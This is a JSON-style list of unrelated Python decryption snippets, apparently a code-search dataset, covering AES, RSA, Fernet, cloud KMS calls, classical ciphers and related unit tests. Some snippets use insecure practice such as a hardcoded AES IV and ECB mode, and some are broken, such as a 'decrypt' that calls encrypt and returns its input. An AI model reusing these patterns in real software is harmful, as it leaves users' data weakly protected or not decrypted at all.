[ "def decrypt(ciphertext: str, key: str) -> str:\n return encrypt(ciphertext, key)", "def test_decryption(d, c):\n\n#\td = int(raw_input(\"\\nEnter d from public key\\n\"))\n#\tc = int(raw_input(\"\\nEnter c from public key\\n\"))\n\n x = int(raw_input(\"\\nEnter number to decrypt\\n\"))\n decode(endecrypt(x, d, c))", "def _get_decryption_key(self, **options):\n\n raise CoreNotImplementedError()", "def _get_decryption_key(self, **options):\n\n return self._get_encryption_key(**options)", "def decrypt(self, key):\n super(MACDataUplinkMessage, self).decrypt(key, dir=0)", "def rsa_decrypt(cypher, privatekey):\r\n \r\n # A key object is created to interact with the PyCrypto\r\n # encryption suite. The object contains key data and\r\n # the necessary rsa functions.\r\n temp_key_obj = _rsa_keydict_to_keyobj(privatekey = privatekey) \r\n \r\n return _rsa_gluechops(cypher, temp_key_obj, temp_key_obj.decrypt)", "def _get_decryption_key(self, **options):\n\n return self._private_key", "def decrypt(cypher, priv_key):\n\n if not isinstance(priv_key, key.PrivateKey):\n raise TypeError(\"You must use the private key with decrypt\")\n\n return gluechops(cypher, priv_key.d, priv_key.n, decrypt_int)", "def test_decryption_private_key_not_given(self) -> None:\n\n given = \"Hello, World!\"\n\n encryptor = DataEncryption()\n\n self.assertRaises(ValueError, lambda: encryptor.decrypt_data(given))", "def test_decrypt_key_incorrect(self):\n right_key = b'0' * 32\n wrong_key = b'1' * 32\n\n encrypted = encrypt('message', key=right_key)\n\n with pytest.raises(EncryptionError):\n decrypt(encrypted, key=wrong_key)", "def decrypt(self,message, key):\n return self.translateMessage(message, key, \"decrypt\")", "def decrypt_pk(priv_key, ciphertext):\n try:\n plaintext = priv_key.decrypt(\n b64decode(ciphertext),\n padding.OAEP(\n mgf=padding.MGF1(algorithm=CryptoHash()),\n algorithm=CryptoHash(),\n label=None\n )\n )\n except UnsupportedAlgorithm as e:\n # a failure to dencrypt someone else's data is not typically a fatal\n # error, but in this particular case, the most likely cause of this\n # error is an old cryptography library\n logging.error(\"Fatal error: encryption hash {} unsupported, try upgrading to cryptography >= 1.4. 
Exception: {}\".format(\n CryptoHash, e))\n # re-raise the exception for the caller to handle\n raise e\n return plaintext", "def setup_key_decrypt(self):\r\n\t\tself.max_key = math.floor(len(self.message) / 2)\r\n\t\twhile True:\r\n\t\t\tkey = input(\"Please enter the key that was used to encrypt your message.--> \")\r\n\t\t\ttry:\r\n\t\t\t\tself.key = int(key)\r\n\t\t\texcept ValueError:\r\n\t\t\t\tprint(\"Key needs to be a number.\")\r\n\t\t\t\tcontinue\r\n\t\t\tif self.key > self.max_key: \t\t\t\r\n\t\t\t\tprint(f\"{key} is too big of a number.\")\r\n\t\t\telif self.key == 0:\r\n\t\t\t\tprint(\"0 cannot be a key.\")\t\t\t\t\r\n\t\t\telse:\t\t\t\r\n\t\t\t\tbreak", "def decrypt_key(data, key):\n data = MegaCrypto.base64_decode(data)\n return sum((MegaCrypto.str_to_a32(MegaCrypto.cbc_decrypt(data[_i:_i + 16], key))\n for _i in range(0, len(data), 16)), ())", "def _decrypt(self, key, value):\n payload = EncryptedPayload.from_json(value)\n if not payload:\n return value\n\n decrypted = self._kms_crypto.decrypt_payload(payload)\n if not decrypted:\n return value\n\n key_prefix = '%s=' % key\n if not decrypted.startswith(key_prefix):\n return value\n\n return decrypted[len(key_prefix):]", "def _decode_key(self, key):\n return key if not key or isinstance(key, str) else key.decode()", "def decryptor(file_name, key):\n\twith open(file_name, 'rb') as dfile:\n\t\tciphertext = dfile.read()\n\t\tdec = decrypt(key, ciphertext)\n\t\tdfile.close()\n\t\tdtext = \"The encrypted file was opened by macupdate.py by the user: \"\n\t\tcreateLog(dtext, 'logs/macupdate.log')\n\t\treturn dec", "def decrypt(self, key, dir):\n self.encrypt(key, dir)", "def test_decrypt_key_invalid(self):\n encrypted = encrypt('message', key=b'0' * 32)\n\n with pytest.raises(EncryptionError):\n decrypt(encrypted, key=b'0' * 31)", "def test_decrypt_key_default(self, settings):\n settings.CHITON_ENCRYPTION_KEY = b'0' * 32\n\n encrypted = encrypt('message')\n assert decrypt(encrypted) == 'message'\n\n settings.CHITON_ENCRYPTION_KEY = b'1' * 32\n with pytest.raises(EncryptionError):\n decrypt(encrypted)", "def decrypt(self, key, device, private_key):\n device_key = base64.b64decode(self.keys[device.id.hex])\n\n master_key = private_key_decrypt(private_key, device_key)\n\n if master_key is None:\n return\n\n return fernet_decrypt(self.values[key], master_key, self.salt)", "def decrypt(key, ciphertext):\n data = fk(keyGen(key)[1], ip(ciphertext))\n return fp(fk(keyGen(key)[0], swapNibbles(data)))", "def decrypt(self, data):", "def populate_ios_decryption_key(self, base64_key: bytes):\r\n # case: the base64 encoding can come in garbled, but still pass through decode_base64 as an\r\n # un-unicodeable 256 byte(?!) binary blob, but it base64 decodes into a 16 byte key. The fix\r\n # is to decode_base64 -> encode_base64, which magically creates the correct base64 blob. 
wtf\r\n try:\r\n base64_str: str = base64_key.decode()\r\n except UnicodeDecodeError:\r\n # this error case makes no sense\r\n base64_str: str = encode_base64(decode_base64(base64_key)).decode()\r\n \r\n try:\r\n IOSDecryptionKey.objects.create(\r\n file_name=self.file_name,\r\n base64_encryption_key=base64_str,\r\n participant=self.participant,\r\n )\r\n return\r\n except ValidationError as e:\r\n print(f\"ios key creation FAILED for '{self.file_name}'\")\r\n # don't fail on other validation errors\r\n if \"already exists\" not in str(e):\r\n raise\r\n \r\n extant_key: IOSDecryptionKey = IOSDecryptionKey.objects.get(file_name=self.file_name)\r\n # assert both keys are identical.\r\n if extant_key.base64_encryption_key != base64_str:\r\n print(\"ios key creation unknown error 2\")\r\n raise IosDecryptionKeyDuplicateError(\r\n f\"Two files, same name, two keys: '{extant_key.file_name}': \"\r\n f\"extant key: '{extant_key.base64_encryption_key}', '\"\r\n f\"new key: '{base64_str}'\"\r\n )", "def decode_and_decrypt(encoded_data, key):\r\n return aes_decrypt(base64.urlsafe_b64decode(encoded_data), key)", "def decrypt(key, cipher, plaintext):\n\n rsa = Rsa()\n\n try:\n k = TomlKeyFormatter().from_string(key.read())\n\n c = cipher.read()\n p = rsa.decrypt(c, k)\n\n plaintext.write(p)\n\n except KeyFormatError:\n click.echo(\"ERROR: Key is in bad format\")\n\n except DecryptError:\n click.echo(\"ERROR: Key is wrong or message was badly padded before encryption\")", "def decrypt(data, key):\n data = six.ensure_binary(data)\n try:\n data = privy.peek(hidden=data, password=key)\n except ValueError:\n error = \"Unable to decrypt {cnt} bytes of data using key {k}, invalid key!\"\n error = error.format(cnt=len(data), k=key)\n raise exceptions.ModuleError(error)\n return six.ensure_text(data)", "def decrypt(self, input, key, iv) :\n pass", "def decrypt(key, cipher, use_custom=False):\n result = logic(key, cipher, use_custom)\n return array.array(\"B\", result)", "def decrypt_data(self, encrypted_data):\n raise NotImplementedError", "def decrypt(key, input_token):\n try:\n target = decrypt_string(input_token.strip(), key=key)\n except InvalidToken:\n click.echo('Error: Token is invalid')\n sys.exit(1)\n\n click.echo('The decrypted result is: ', nl=False)\n click.echo(click.style(target, fg='blue'))", "def decrypt(priv_key, ciphertext):\n pk_encrypted_secret_key = ciphertext['pk_encrypted_secret_key']\n sym_encrypted_data = ciphertext['sym_encrypted_data']\n # TODO: secure delete\n secret_key = decrypt_pk(priv_key, pk_encrypted_secret_key)\n encoded_string = decrypt_symmetric(secret_key, sym_encrypted_data)\n return decode_data(encoded_string)", "def _disabled_decrypt(self, *args, **kwargs):\n raise NotImplementedError('\"decrypt\" is not supported by the \"{}\" algorithm'.format(self.java_name))", "def asym_dec(self, ciph, keyfile):\n ciph = ciph.split('\\0')\n ciphkey_len = int(ciph[0])\n ciph = '\\0'.join(ciph[1:])\n ciphkey = ciph[:ciphkey_len]\n ciph = ciph[ciphkey_len:]\n\n passphrase = xsystem([self.sslname, 'rsautl', '-decrypt', '-inkey',\n keyfile], ciphkey)\n if not passphrase:\n warning('keymanagement: Unable to perform asymmetric decryption\\n')\n return None\n\n return self.sym_dec(ciph, passphrase)", "def decrypt(path, key):\n key = load_key(key)\n\n if p.isdir(path):\n # encrypt a directory\n return decrypt_dir(path, key)\n # decrypt a file\n path = decrypt_file(path, key)\n # check if file contains suffix\n if \"-encrypted.zip\" in path:\n return decrypt_dir(path, key)\n return", "def 
decrypt(self, ciphertext: bytes,\n padding: AsymmetricPadding) -> bytes:\n pass", "def decrypt_data_key(self, dataKeyCypher, token, userGroup):\n masterKey = self.retrieve_master_key(token=token, userGroup=userGroup)\n box = secret.SecretBox(masterKey)\n if isinstance(dataKeyCypher, str):\n dataKeyCypher = dataKeyCypher.encode('cp855')\n try:\n plainText = box.decrypt(dataKeyCypher).decode('utf-8')\n except Exception:\n raise UnableToDecryptException(\"Unable to verify cyphertext/key pair\")\n return plainText", "def _decrypt_data_key(self, encrypted_data_key, algorithm, encryption_context):\n # Wrapped EncryptedDataKey to deserialized EncryptedData\n encrypted_wrapped_key = aws_encryption_sdk.internal.formatting.deserialize.deserialize_wrapped_key(\n wrapping_algorithm=self.config.wrapping_key.wrapping_algorithm,\n wrapping_key_id=self.key_id,\n wrapped_encrypted_key=encrypted_data_key,\n )\n # EncryptedData to raw key string\n plaintext_data_key = self.config.wrapping_key.decrypt(\n encrypted_wrapped_data_key=encrypted_wrapped_key, encryption_context=encryption_context\n )\n # Raw key string to DataKey\n return DataKey(\n key_provider=encrypted_data_key.key_provider,\n data_key=plaintext_data_key,\n encrypted_data_key=encrypted_data_key.encrypted_data_key,\n )", "def aes_decrypt(encrypted_data, key):\r\n cipher = aes_cipher_from_key(key)\r\n padded_data = cipher.decrypt(encrypted_data)\r\n return unpad(padded_data)", "def decrypt(self, cypher):\n\n if self.crypt_private == \"\":\n raise ValueError(\"Error decrypting: No private encryption key found for {}\".format(self))\n\n key_private = RsaPrivateKey.Read(self.crypt_private)\n return key_private.Decrypt(cypher)", "def _decrypt(self, value, **options):\n\n raise CoreNotImplementedError()", "def decrypt_char(o, k):\n o1 = ord(o) # outfile char\n k1 = ord(k) # keyfile char\n\n x = o1 ^ 0x80\n x = x - k1\n if x >= 0x1 and x <= 0x7e:\n return chr(x)\n\n x = o1 - k1\n if x >= 0x1 and x <= 0x7e:\n return chr(x)\n\n return None", "def decrypt(self, key, data, mode, padding):\n # pylint: disable=unused-argument,no-self-use\n if hasattr(key, \"public_bytes\"):\n raise NotImplementedError('\"decrypt\" is not supported by public keys')\n try:\n return key.decrypt(data, padding.build())\n except Exception:\n error_message = \"Decryption failed\"\n _LOGGER.exception(error_message)\n raise DecryptionError(error_message)", "def test_get_private_key(self):\n\n expected = self.pem_private_key\n\n encryptor = DataEncryption()\n encryptor.set_private_key(self.pem_private_key.decode())\n\n actual = encryptor.get_private_key()\n\n self.assertEqual(expected, actual)", "def private_key(\n self,\n key: str,\n default: Any = undefined,\n description: str = None,\n key_format: Optional[EncryptionKeyFormat] = None,\n passphrase: Optional[str] = None,\n **kwargs\n ) -> Optional[PrivateKey]:\n cast_key = partial(cast_private_key, key_format=key_format, passphrase=passphrase)\n return self._process(key, description=description, default=default, cast=cast_key,type=PrivateKey, **kwargs)", "def _decrypt(self, data, key):\n seed1 = key\n seed2 = 0xEEEEEEEE\n result = BytesIO()\n\n for i in range(len(data) // 4):\n seed2 += self.encryption_table[0x400 + (seed1 & 0xFF)]\n seed2 &= 0xFFFFFFFF\n value = struct.unpack(\"<I\", data[i*4:i*4+4])[0]\n value = (value ^ (seed1 + seed2)) & 0xFFFFFFFF\n\n seed1 = ((~seed1 << 0x15) + 0x11111111) | (seed1 >> 0x0B)\n seed1 &= 0xFFFFFFFF\n seed2 = value + seed2 + (seed2 << 5) + 3 & 0xFFFFFFFF\n\n result.write(struct.pack(\"<I\", 
value))\n\n return result.getvalue()", "def __init__(self, key):\n if len(key) > KEY_SIZE:\n raise ParameterError(\"Key must be <%d bytes\" % (KEY_SIZE))\n\n self.key = key.ljust(KEY_SIZE, b\"\\xff\")\n self.encryptIV = b\"\\xff\" * BLOCK_SIZE\n self.decryptIV = b\"\\xff\" * BLOCK_SIZE\n self.remainingData = b\"\"\n self.oldDecrypt = b\"\"", "def decrypt(self, key, encrypted):\n output = []\n padded_key = padd_key(key, encrypted)\n for i in range(len(encrypted)):\n dec_ascii = (ord(encrypted[i]) - ord(padded_key[i])) % 256\n output.append(chr(dec_ascii))\n return ''.join(output)", "def decrypt_symmetric(self, ciphertext):\n from google.cloud import kms_v1\n\n # Creates an API client for the KMS API.\n client = kms_v1.KeyManagementServiceClient()\n\n # The resource name of the CryptoKey.\n name = client.crypto_key_path_path(self.project_id, self.location_id, self.key_ring_id,\n self.crypto_key_id)\n # Use the KMS API to decrypt the data.\n response = client.decrypt(name, ciphertext)\n return response.plaintext", "def decrypt(text,key):\r\n aes = pyaes.AESModeOfOperationCTR(key)\r\n decrypted = aes.decrypt(text)\r\n return decrypted", "def decrypt(self, encrypted_token: bytes) -> bytes:\n return None", "def decrypt(message, key):\r\n\r\n # --- YOU CODE STARTS HERE\r\n if type(message) != str or type(key) != int:\r\n return 'Invalid input'\r\n new_st = ''\r\n alpha_lower = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\r\n alpha_upper = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\r\n\r\n for x in message:\r\n if (alpha_lower.count(x) != 0) or (alpha_upper.count(x) != 0):\r\n if alpha_lower.count(x) != 0:\r\n new_st += alpha_lower[alpha_lower.index(x) - key]\r\n if alpha_upper.count(x) != 0:\r\n new_st += alpha_upper[alpha_upper.index(x) - key]\r\n else:\r\n new_st += x\r\n\r\n return new_st\r\n\r\n\r\n # --- CODE ENDS HERE\r", "def test_set_private_key(self) -> None:\n\n expected = self.pem_private_key.decode()\n\n encryptor = DataEncryption(private_key=self.pem_private_key)\n\n # pylint: disable=protected-access\n actual = encryptor._loaded_private_key.private_bytes(\n serialization.Encoding.PEM,\n serialization.PrivateFormat.PKCS8,\n serialization.NoEncryption(),\n ).decode()\n\n self.assertEqual(expected, actual)", "def test_endecrypt():\n\n e, d, c = keygen()\n\n test_encryption(e, c)\n test_decryption(d, c)\n key_cracker(e, c)", "def decrypt(ciphertext, key):\n\ttry:\n\t\tfrom Cryptodome.Cipher import AES\n\texcept ImportError:\n\t\tfrom Crypto.Cipher import AES\n\n\tif not isPython2():\n\t\tif isString(ciphertext):\n\t\t\tciphertext = ciphertext.encode(\"latin-1\")\n\t\tif isString(key):\n\t\t\tkey = key.encode(\"latin-1\")\n\t\t\n\tiv = ciphertext[:AES.block_size]\n\tcipher = AES.new(key, AES.MODE_CBC, iv)\n\tplaintext = cipher.decrypt(ciphertext[AES.block_size:])\n\treturn plaintext", "def decrypt(enc_data=None, pk=None, sk=None, pairing_group=None, debug=0):\n\n # Check if enc_data is set\n if enc_data is None:\n logging.error('decrypt_seed_key ciphertext exception')\n if debug: # ONLY USE FOR DEBUG\n print('EXCEPTION in decrypt_seed_key ciphertext')\n raise Exception\n\n # Check if pk is set and it exists\n if pk is None:\n logging.error('[ERROR] decrypt_seed_key pk_file exception')\n if debug: # ONLY USE FOR DEBUG\n print('EXCEPTION in decrypt_seed_key pk_file')\n raise Exception\n\n # Check if sk is set and it 
exists\n if sk is None:\n logging.error('decrypt_seed_key sk_file exception')\n if debug: # ONLY USE FOR DEBUG\n print('EXCEPTION in decrypt_seed_key sk_file')\n raise Exception\n\n # Decrypt data with CP-ABE and return the result\n cpabe = CPabe_BSW07(pairing_group)\n return cpabe.decrypt(pk, sk, enc_data)", "def rsa_decrypt(data, rsa_priv_key_str):\r\n key = RSA.importKey(rsa_priv_key_str)\r\n cipher = PKCS1_OAEP.new(key)\r\n return cipher.decrypt(data)", "def decrypt(cls, ciphertext_and_tag, aad, key, iv):", "def decrypt_symmetric(secret_key, ciphertext, ttl=None):\n f = Fernet(secret_key)\n # fernet requires the ciphertext to be bytes, it will raise an exception\n # if it is a string\n return f.decrypt(bytes(ciphertext), ttl)", "def decrypt(self, cypher):\n\n cypher = b64decode(cypher)\n key_private = RsaPrivateKey.Read(self.crypt_private)\n return key_private.Decrypt(cypher)", "def Decrypt(key, value):\n key = key.zfill(32)[:32]\n aes = AES.new(key, AES.MODE_ECB)\n encrypted = base64.b64decode(value)\n decrypted = aes.decrypt(encrypted)\n return RemovePadding(decrypted)", "def load_key(self, key, key_type, key_encoding):\n if key_type is not EncryptionKeyType.SYMMETRIC:\n raise ValueError(\n 'Invalid key type \"{key_type}\" for cipher \"{cipher}\"'.format(key_type=key_type, cipher=self.java_name)\n )\n\n if key_encoding is not KeyEncodingType.RAW:\n raise ValueError(\n 'Invalid key encoding \"{key_encoding}\" for cipher \"{cipher}\"'.format(\n key_encoding=key_encoding, cipher=self.java_name\n )\n )\n\n return key", "def decrypt_message(encrypted_message):", "def decrypt(key, encoded):\n \n if isinstance(encoded, str):\n encoded = map(ord, encoded)\n key = _key_array(key)\n aes = mxit.aes.AES()\n \n parts = _split(encoded, 16)\n decoded = []\n for part in parts:\n decoded += aes.decrypt(part, key, aes.keySize[\"SIZE_128\"]) \n return _get_text(decoded)", "def decrypt_epic(aes_key, encrypted_data):\n # Decode encrypted string\n decoded = base64.b64decode(encrypted_data)\n\n # Decrypt decoded string\n decoded_readable = CryptDecrypt(aes_key, decoded).decode('utf-8')\n return decoded_readable", "def decrypt_epic(aes_key, encrypted_data):\n # Decode encrypted string\n decoded = base64.b64decode(encrypted_data)\n\n # Decrypt decoded string\n decoded_readable = CryptDecrypt(aes_key, decoded).decode('utf-8')\n return decoded_readable", "def decrypt(data, private_key):\r\n\r\n # Retrieve session key, tag, ciphertext and nonce from file\r\n enc_session_key, nonce, tag, ciphertext = \\\r\n [ file_in.read(x) for x in (private_key.size_in_bytes(), 16, 16, -1) ]\r\n\r\n\r\n # Decrypt the session key\r\n session_key = cipher_rsa.decrypt(enc_session_key)\r\n\r\n # Decrypt the data with the AES session key\r\n cipher_aes = AES.new(session_key, AES.MODE_EAX, nonce)\r\n data = cipher_aes.decrypt_and_verify(ciphertext, tag)\r\n\r\n return data", "def fernet_decript(key,message):\n\tf = Fernet(key)\n\treturn f.decrypt(message)", "def extract_aes_key(self) -> bytes:\r\n log(\"extract_aes_key start\")\r\n try:\r\n key_base64_raw: bytes = self.file_lines[0]\r\n except IndexError:\r\n # shouldn't be reachable due to test for emptiness prior in code, keep around anyway.\r\n log(\"extract_aes_key fail 1\")\r\n raise DecryptionKeyInvalidError(\"There was no decryption key.\")\r\n \r\n # Test that every byte in the byte-string of the raw key is a valid url-safe base64\r\n # character this also cuts down some junk files.\r\n for c in key_base64_raw:\r\n if c not in URLSAFE_BASE64_CHARACTERS:\r\n 
log(f\"extract_aes_key fail 2: '{key_base64_raw.decode()}' character: '{chr(c)}'\")\r\n raise DecryptionKeyInvalidError(f\"Key not base64 encoded: {str(key_base64_raw)}\")\r\n \r\n # handle the various cases that can occur when extracting from base64.\r\n try:\r\n decoded_key: bytes = decode_base64(key_base64_raw)\r\n except (TypeError, PaddingException, Base64LengthException) as decode_error:\r\n log(\"extract_aes_key fail 3\")\r\n raise DecryptionKeyInvalidError(f\"Invalid decryption key: {decode_error}\")\r\n \r\n base64_key = self.rsa_decrypt(decoded_key)\r\n \r\n try:\r\n decrypted_key: bytes = decode_base64(base64_key)\r\n if not decrypted_key:\r\n log(\"extract_aes_key fail 4\")\r\n raise TypeError(f\"decoded key was '{decrypted_key}'\")\r\n except (TypeError, IndexError, PaddingException, Base64LengthException) as decr_error:\r\n log(\"extract_aes_key fail 5\")\r\n raise DecryptionKeyInvalidError(f\"Invalid decryption key: {decr_error}\")\r\n \r\n # If the decoded bits of the key is not exactly 128 bits (16 bytes) that probably means that\r\n # the RSA encryption failed - this occurs when the first byte of the encrypted blob is all\r\n # zeros. Apps require an update to solve this (in a future rewrite we should use a correct\r\n # padding algorithm).\r\n if len(decrypted_key) != 16:\r\n log(\"extract_aes_key 6\")\r\n raise DecryptionKeyInvalidError(f\"Decryption key not 128 bits: {decrypted_key}\")\r\n \r\n if self.participant.os_type == IOS_API:\r\n self.populate_ios_decryption_key(base64_key)\r\n \r\n log(\"extract_aes_key success\")\r\n return decrypted_key", "def decrypt_letter(letter, keystr_value):\n \n letter_value = ord(letter) - 65\n if (letter_value - keystr_value) < 0:\n new_value = letter_value - keystr_value + 26 + 65\n decrypted_letter = chr(new_value)\n else:\n new_value = letter_value - keystr_value + 65\n decrypted_letter = chr(new_value)\n return decrypted_letter", "def decrypt(key: str, encrypted: str) -> str:\n\n key_len = len(key)\n decrypted = ''\n\n # Go through the encrypted string in chunks the length of the key\n for i in range(0, len(encrypted), key_len):\n chunk = encrypted[i:i + key_len] # Pull out a chunk the size of the key\n\n # Apply the key to the chunk\n for j, c in enumerate(chunk):\n decrypted += chr(ord(key[j]) ^ ord(c))\n\n return decrypted", "def private_key(self):", "def decryptEncryptionKey(cipherString, key):\n\tencryptionType, iv, cipherText, mac = decodeCipherString(cipherString)\n\t# log.debug(\"mac:%s\", mac)\n\t# log.debug(\"iv:%s\", iv)\n\t# log.debug(\"ct:%s\", cipherText)\n\tassert mac is None\n\tif encryptionType != 0:\n\t\traise UnimplementedError(\"can not decrypt type:%s\" % encryptionType)\n\tcipher = cryptography.hazmat.primitives.ciphers.Cipher(\n\t algorithms.AES(key), modes.CBC(iv), backend=default_backend())\n\tdecryptor = cipher.decryptor()\n\tplainText = decryptor.update(cipherText) + decryptor.finalize()\n\t# log.debug(\"mackey before unpad:%s\", plainText[32:])\n\treturn plainText[:32], plainText[32:64]", "def decrypt(self, key, value):\n key = hashlib.sha256(key).digest()[:self.BLOCK_SIZE]\n iv = value[:16]\n crypted = value[16:]\n cipher = AES.new(key,AES.MODE_CBC,iv)\n return self.pkcs5_unpad(cipher.decrypt(crypted))", "def _decrypt_pvtkey(self, pvtkey_file: str, passphrase: str) -> str:\n\n keydata: str = None\n if pvtkey_file:\n try:\n keydata = asyncssh.public_key.read_private_key(pvtkey_file,\n passphrase)\n except Exception as e:\n self.logger.error(\n f\"ERROR: Unable to read private key file 
{pvtkey_file}\"\n f\"for jump host due to {str(e)}\")\n\n return keydata", "def decrypt(crypto, priv):\r\n string = rsa.encrypt(crypto, priv)\r\n string = livingDead.utfE(crypto)\r\n return crypto", "def decrypt(encryption_value):\n Common.logger.info(\"Decryption job started started\")\n key = Common.get_config_value(\"jenkins_key\")\n fkey = Fernet(key.encode())\n decrypt_value = fkey.decrypt(encryption_value.encode())\n return decrypt_value", "def test_rekey_key_format(self):\n old_key = b'0' * 32\n encrypted = encrypt('message', key=old_key)\n\n with pytest.raises(EncryptionError):\n rekey(encrypted, old_key=old_key, new_key=b'1' * 31)", "def decrypt(project_id, location_id, key_ring_id, crypto_key_id,\n ciphertext_file_name, plaintext_file_name):\n\n # Creates an API client for the KMS API.\n kms_client = googleapiclient.discovery.build('cloudkms', 'v1')\n\n # The resource name of the CryptoKey.\n name = 'projects/{}/locations/{}/keyRings/{}/cryptoKeys/{}'.format(\n project_id, location_id, key_ring_id, crypto_key_id)\n\n # Read encrypted data from the input file.\n with io.open(ciphertext_file_name, 'rb') as ciphertext_file:\n ciphertext = ciphertext_file.read()\n\n # Use the KMS API to decrypt the data.\n crypto_keys = kms_client.projects().locations().keyRings().cryptoKeys()\n request = crypto_keys.decrypt(\n name=name,\n body={'ciphertext': base64.b64encode(ciphertext).decode('ascii')})\n response = request.execute()\n plaintext = base64.b64decode(response['plaintext'].encode('ascii'))\n\n # Write the decrypted data to a file.\n with io.open(plaintext_file_name, 'wb') as plaintext_file:\n plaintext_file.write(plaintext)\n\n print('Saved plaintext to {}.'.format(plaintext_file_name))", "def dh_decrypt(priv, ciphertext):\n Group1,private, public = dh_get_key()#generate new DH pair for Bob\n iv=ciphertext[0]\n cipher=ciphertext[1]\n tag=ciphertext[2]\n pubA=ciphertext[3]\n \n #Bob derives shared secret key by multiplying his public key with Alice's private key\n shared2 = pubA.pt_mul(priv)#qA * dB\n print \"key from dec is\", shared2\n\n hashedKey=sha256(shared2.export()).digest()\n \n aes = Cipher(\"aes-128-gcm\")\n plain = aes.quick_gcm_dec(hashedKey[:16], iv, cipher, tag)#where to get IV and tag from ???\n \n return plain.encode(\"utf8\")", "def decrypt():\n plaintext = \"\"\n i = 0\n while i < len(ciphertext):\n if i%2==1:\n try:\n plaintext += key[ ciphertext[i-1]+ciphertext[i] ]\n except KeyError:\n plaintext += ciphertext[i-1]+ciphertext[i]\n i += 1\n return plaintext", "def decrypt(private_key, ciphertext):\n if len(ciphertext) < 512 + 16:\n return None\n msg_header = ciphertext[:512]\n msg_iv = ciphertext[512:512+16]\n msg_body = ciphertext[512+16:]\n try:\n symmetric_key = PKCS1_OAEP.new(private_key).decrypt(msg_header)\n except ValueError:\n return None\n if len(symmetric_key) != 32:\n return None\n return AES.new(symmetric_key,\n mode=AES.MODE_CFB,\n IV=msg_iv).decrypt(msg_body)", "def decrypt_data(data, encryption_key):\n assert isinstance(data, str)\n obj = AES.new(encryption_key, AES.MODE_CBC, 'This is an IV456')\n bytes_data = bytes.fromhex(data)\n return Pad.unpad(obj.decrypt(bytes_data)).decode()", "def decrypt_data ( aes_key, data ) :\n decoded_data = decode_data( data )\n salt = decoded_data[ 0 : Crypto.Cipher.AES.block_size ]\n encrypted_data = decoded_data[ Crypto.Cipher.AES.block_size : ]\n cipher = Crypto.Cipher.AES.new( aes_key, Crypto.Cipher.AES.MODE_CFB, salt )\n decrypted_data = cipher.decrypt( encrypted_data )\n\n return decrypted_data", "def 
decrypt(ciphertext: str) -> Iterable:\n return simplesubstitution.decrypt(KEY, ciphertext)", "def xor_decrypt(ciphertext, key):\n\n\tdecrypted_char = ''\n\tdecrypted_str = ''\n\n\tfor char in ciphertext:\n\t\tdecrypted_char = chr(char ^ key)\n\t\tdecrypted_str += decrypted_char\n\n\treturn decrypted_str", "def decryptByteArray(self, data, keyobj):\n raise NotImplementedError(\"Is abstract\")", "def decode(key: str, enc: str) -> str:\n\n dec = []\n enc = base64.urlsafe_b64decode(enc).decode()\n for i in range(len(enc)):\n key_c = key[i % len(key)]\n dec_c = chr((256 + ord(enc[i]) - ord(key_c)) % 256)\n dec.append(dec_c)\n return \"\".join(dec)", "def _decrypt_secret(\n self, \n encryption_key: str,\n secret_list: List,\n secret_name: str\n ):\n f = Fernet(\n bytes(encryption_key, \"utf-8\")\n )\n secret=None\n if 'secrets' in secret_list:\n if secret_name in secret_list['secrets']:\n secret = f.decrypt(\n bytes(secret_list['secrets'][secret_name], \"utf-8\")\n ).decode('UTF-8')\n #self.log.log_success(\n # f'{secret_name} : {secret}'\n #)\n return secret", "def decrypt_vigenere(ciphertext: str, keyword: str) -> str:\n plaintext = \"\"\n # PUT YOUR CODE HERE\n key_lenght = len(keyword)\n text_lenght = len(ciphertext)\n\n while key_lenght != text_lenght:\n keyword += keyword\n key_lenght = len(keyword)\n if key_lenght > text_lenght:\n keyword = keyword[:text_lenght]\n key_lenght = len(keyword)\n code_key = []\n ord_a = ord('a')\n ord_A = ord('A')\n\n if ciphertext.islower():\n for i in range(key_lenght):\n if ciphertext[i] == \" \":\n code_key.append(\" \")\n else:\n code_key.append(ord(keyword[i]) - ord_a)\n code_text = []\n for n in range(text_lenght):\n if ciphertext[n] == \" \":\n code_text.append(\" \")\n else:\n code_text.append(ord(ciphertext[n]) - ord_a)\n for u in range(text_lenght):\n if ciphertext[u] == \" \":\n value = ord(\" \")\n else:\n\n value = ((code_text[u] - code_key[u] + 26) % 26) + ord_a\n plaintext += chr(value)\n else:\n for i in range(key_lenght):\n if ciphertext[i] == \" \":\n code_key.append(\" \")\n else:\n code_key.append(ord(keyword[i]) - ord_A)\n code_text = []\n for n in range(text_lenght):\n if ciphertext[n] == \" \":\n code_text.append(\" \")\n else:\n code_text.append(ord(ciphertext[n]) - ord_A)\n for u in range(text_lenght):\n if ciphertext[u] == \" \":\n value = ord(\" \")\n else:\n value = ((code_text[u] - code_key[u] + 26) % 26) + ord_A\n plaintext += chr(value)\n\n return plaintext", "def decrypt_file(self, file_name, key):\n with open(file_name, 'rb') as fo:\n try:\n ciphertext = fo.read()\n except:\n print \"[-] Error opening file {0} for reading.\".format(file_name)\n return\n try:\n dec = self.decrypt(ciphertext, key)\n except:\n print \"[-] Decryption failed.\"\n return\n\n with open(file_name[:-4], 'wb') as fo:\n try:\n fo.write(dec)\n except:\n print \"[-] Error writing out file {0}\".format(file_name[:-4])\n return\n\n os.chmod(file_name[:-4], 0600)\n return file_name[:-4]", "def test_rekey(self):\n old_key = b'0' * 32\n new_key = b'1' * 32\n\n old_encrypted = encrypt('message', key=old_key)\n new_encrypted = rekey(old_encrypted, old_key=old_key, new_key=new_key)\n\n assert decrypt(new_encrypted, key=new_key) == 'message'", "def decrypt(self, ciphertext, key):\n iv = ciphertext[:AES.block_size]\n cipher = AES.new(key, AES.MODE_CBC, iv, segment_size=64)\n plaintext = cipher.decrypt(ciphertext[AES.block_size:])\n return self.pkcs7_unpad(plaintext)", "def decrypt(code):\n f = Fernet(settings.SECRET_KEY)\n return f.decrypt(code).decode('ascii')", 
